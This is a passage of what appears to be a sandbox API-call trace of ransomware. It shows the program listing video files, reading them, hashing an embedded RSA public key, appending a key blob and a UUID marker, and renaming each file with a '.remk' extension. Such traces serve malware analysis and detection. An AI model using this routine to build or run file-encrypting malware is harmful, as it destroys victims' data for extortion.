Size=0x820) returned 0x37a2b08 [0236.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0236.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0236.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0236.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0236.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.783] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\") returned="xB0W_x\\" [0236.783] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\") returned="CSFg h-wcbKcac\\" [0236.783] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\") returned="PCPKs0u\\" [0236.783] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0236.783] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0236.783] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0236.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.783] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0236.783] PathFindFileNameW (pszPath="") returned="" [0236.783] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe933d360, ftCreationTime.dwHighDateTime=0x1d5da34, ftLastAccessTime.dwLowDateTime=0x6e1e7430, ftLastAccessTime.dwHighDateTime=0x1d5d923, ftLastWriteTime.dwLowDateTime=0x6e1e7430, ftLastWriteTime.dwHighDateTime=0x1d5d923, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0236.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 [0236.786] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe933d360, ftCreationTime.dwHighDateTime=0x1d5da34, ftLastAccessTime.dwLowDateTime=0x6e1e7430, ftLastAccessTime.dwHighDateTime=0x1d5d923, ftLastWriteTime.dwLowDateTime=0x6e1e7430, ftLastWriteTime.dwHighDateTime=0x1d5d923, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0236.786] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5cd8ce90, ftCreationTime.dwHighDateTime=0x1d5d9dd, ftLastAccessTime.dwLowDateTime=0xd837ed60, ftLastAccessTime.dwHighDateTime=0x1d5e625, ftLastWriteTime.dwLowDateTime=0xd837ed60, ftLastWriteTime.dwHighDateTime=0x1d5e625, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dcR8Wn", cAlternateFileName="")) returned 1 [0236.787] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8220c060, ftCreationTime.dwHighDateTime=0x1d5e2ff, ftLastAccessTime.dwLowDateTime=0xabf7e840, ftLastAccessTime.dwHighDateTime=0x1d5e413, ftLastWriteTime.dwLowDateTime=0xabf7e840, ftLastWriteTime.dwHighDateTime=0x1d5e413, nFileSizeHigh=0x0, nFileSizeLow=0xdbf9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dg1ZR5LE5.mkv", cAlternateFileName="DG1ZR5~1.MKV")) returned 1 [0236.787] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dg1ZR5LE5.mkv") returned=".mkv" [0236.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dg1ZR5LE5.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\dg1zr5le5.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.788] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=56313) returned 1 [0236.788] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.791] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xdbd3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.791] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.793] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xdbf9, lpOverlapped=0x0) returned 1 [0236.794] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.794] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.794] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.794] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694f48) returned 1 [0236.795] CryptCreateHash (in: hProv=0x694f48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.795] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.795] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.795] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.795] GetLastError () returned 0x0 [0236.795] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.795] CryptReleaseContext (hProv=0x694f48, dwFlags=0x0) returned 1 [0236.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.796] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.796] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.796] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.796] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.797] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xdbf9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.797] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.797] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.797] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.797] CloseHandle (hObject=0x640) returned 1 [0236.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3186340 [0236.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bd408 [0236.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3186340 | out: hHeap=0x630000) returned 1 [0236.803] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dg1ZR5LE5.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\dg1zr5le5.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dg1ZR5LE5.mkv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\dg1zr5le5.mkv.remk")) returned 1 [0236.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.804] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31658e8 | out: hHeap=0x630000) returned 1 [0236.805] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41c9110, ftCreationTime.dwHighDateTime=0x1d5e541, ftLastAccessTime.dwLowDateTime=0x23ca9950, ftLastAccessTime.dwHighDateTime=0x1d5dc42, ftLastWriteTime.dwLowDateTime=0x23ca9950, ftLastWriteTime.dwHighDateTime=0x1d5dc42, nFileSizeHigh=0x0, nFileSizeLow=0xab0a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GodaZbgKBQyE.flv", cAlternateFileName="GODAZB~1.FLV")) returned 1 [0236.805] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e990 [0236.805] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0236.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e990 | out: hHeap=0x630000) returned 1 [0236.805] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\GodaZbgKBQyE.flv") returned=".flv" [0236.805] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\GodaZbgKBQyE.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\godazbgkbqye.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.806] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=43786) returned 1 [0236.806] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.808] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xaae4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.808] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.810] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.810] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xab0a, lpOverlapped=0x0) returned 1 [0236.811] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.811] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.811] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.811] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694f48) returned 1 [0236.812] CryptCreateHash (in: hProv=0x694f48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.812] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.812] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.812] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.812] GetLastError () returned 0x0 [0236.812] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.812] CryptReleaseContext (hProv=0x694f48, dwFlags=0x0) returned 1 [0236.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.813] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.813] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.813] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xab10) returned 0x37cf820 [0236.813] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cef40 [0236.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc870 [0236.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cef88 [0236.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc888 [0236.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8b8 [0236.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc918 [0236.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8d0 [0236.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.814] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8b8 | out: hHeap=0x630000) returned 1 [0236.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8d0 | out: hHeap=0x630000) returned 1 [0236.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc918 | out: hHeap=0x630000) returned 1 [0236.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc918 [0236.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc8d0 [0236.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0236.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc8b8 [0236.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0236.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8d0 | out: hHeap=0x630000) returned 1 [0236.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8b8 | out: hHeap=0x630000) returned 1 [0236.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc918 | out: hHeap=0x630000) returned 1 [0236.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.815] GetCurrentThreadId () returned 0x314 [0236.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c6320 [0236.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694f48 [0236.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0236.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 